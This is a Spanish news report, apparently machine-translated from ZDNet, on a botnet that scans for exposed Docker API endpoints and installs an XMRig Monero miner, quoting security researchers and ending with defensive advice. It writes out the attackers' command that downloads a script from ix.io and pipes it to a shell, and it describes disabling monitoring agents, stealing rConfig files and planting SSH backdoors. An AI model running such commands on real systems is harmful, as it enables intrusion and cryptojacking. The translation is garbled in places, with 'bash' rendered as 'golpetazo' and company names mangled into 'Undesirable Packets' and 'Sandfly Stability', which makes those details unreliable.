Imagen: Docker, ZDNet
Actualmente, un grupo de pirateo está escaneando en masa Internet buscando plataformas Docker que tengan puntos finales API expuestos en línea.
El propósito de estos escaneos es permitir que el grupo de hackers envíe comandos a la instancia de Docker e implemente un minero de criptomonedas en una empresa Instancias de Docker, para generar fondos para las propias ganancias del grupo.
Una operación profesional
Esta operación de escaneo masivo en individual comenzó el fin de semana, el 24 de noviembre, e inmediatamente se destacó por su gran tamaño.
«Los usuarios de la API CTI de Bad Packets notarán que la actividad de explotación dirigida a las instancias de Docker expuestas no es nada nuevo y sucede con bastante frecuencia», dijo hoy a ZDNet Troy Mursch, director de investigación y cofundador de Undesirable Packets LLC.
«Lo que distingue a esta campaña fue el gran aumento de la actividad de escaneo. Esto solo justificó una mayor investigación para averiguar qué estaba haciendo esta botnet», dijo.
«Como otros han notado (1, 2), este no es el intento promedio de explotación de script para niños «, nos dijo Mursch, quien descubrió la campaña.» Hubo un nivel moderado de esfuerzo en esta campaña, y no hemos analizado completamente cada cosa que hace. de todavía «.
Lo que sabemos hasta ahora
Lo que sabemos hasta ahora es que el grupo detrás de estos ataques actualmente está escaneando más de 59,000 redes IP (netblocks) en busca de instancias de Docker expuestas.
Una vez que el grupo identifica un host expuesto, los atacantes usan el punto ultimate API para iniciar un contenedor Alpine Linux OS donde ejecutan el siguiente comando:
chroot / mnt / bin / sh -c 'curl -sL4 http://ix.io/1XQa | golpetazo
El comando anterior descarga y ejecuta un script Bash desde el servidor de los atacantes. Este script instala un minero de criptomonedas clásico XMRRig. En los dos días desde que esta campaña ha estado activa, los piratas informáticos ya han extraído 14.82 monedas Monero (XMR), por un valor de poco más de $ 740, anotó Mursch.
Además, esta operación de malware también viene con una medida de autodefensa.
«Una función poco unique pero interesante de la campaña es que desinstala los agentes de monitoreo conocidos y mata un montón de procesos a través de un script descargado desde http: // ix (.) Io / 1XQh», nos dijo Mursch.
Al revisar este script, no solo vemos que los piratas informáticos están desactivando los productos de seguridad, sino que también están cerrando procesos asociados con botnets rivales de minería de criptomonedas, como DDG.
Además, Mursch también descubrió una función del script malicioso que escanea un host infectado en busca de rConfig archivos de configuración, que encripta y roba, enviando los archivos nuevamente al servidor de comando y manage del grupo.
Además, Craig H. Rowland, fundador de Sandfly Stability, también ha notado que los piratas informáticos también crean cuentas de puerta trasera en los contenedores pirateados y dejan atrás las claves SSH para facilitar el acceso y una forma de controlar todos los bots infectados desde una ubicación remota.
Por el momento, Mursch recomienda que los usuarios y las organizaciones que ejecutan instancias de Docker comprueben de inmediato si están exponiendo puntos finales de API en Web, cierran los puertos y luego terminan los contenedores en ejecución no reconocidos.
